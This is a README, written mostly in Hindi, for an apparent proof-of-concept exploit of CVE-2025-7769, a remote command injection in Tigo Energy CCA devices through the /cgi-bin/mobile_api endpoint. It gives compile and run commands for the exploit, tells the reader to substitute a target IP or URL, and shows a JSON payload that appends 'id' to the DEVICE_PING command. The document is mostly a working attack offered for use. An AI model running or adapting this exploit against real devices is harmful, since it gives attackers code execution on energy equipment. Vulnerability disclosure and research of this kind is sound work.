
DEVICE_PING एंडपॉइंट के माध्यम से एक कमांड इंजेक्ट करने के लिए PoC
यह रिपॉजिटरी CVE‑2025‑7769 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Tigo Energy CCA उपकरणों में पाई गई एक गंभीर दूरस्थ कमांड इंजेक्शन भेद्यता है, जो /cgi-bin/mobile_api एंडपॉइंट को उजागर करते हैं।
यह भेद्यता cmd JSON कुंजी के माध्यम से OS कमांड्स इंजेक्ट करके ट्रिगर होती है, जहाँ अनफ़िल्टर्ड इनपुट सीधे एक सिस्टम कॉल में जोड़ दिया जाता है, जो डिवाइस पर पूर्ण दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.
Use -u http://target.com if you want to pass a full base URL instead of IP/port.
Example Payload :
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
MIT License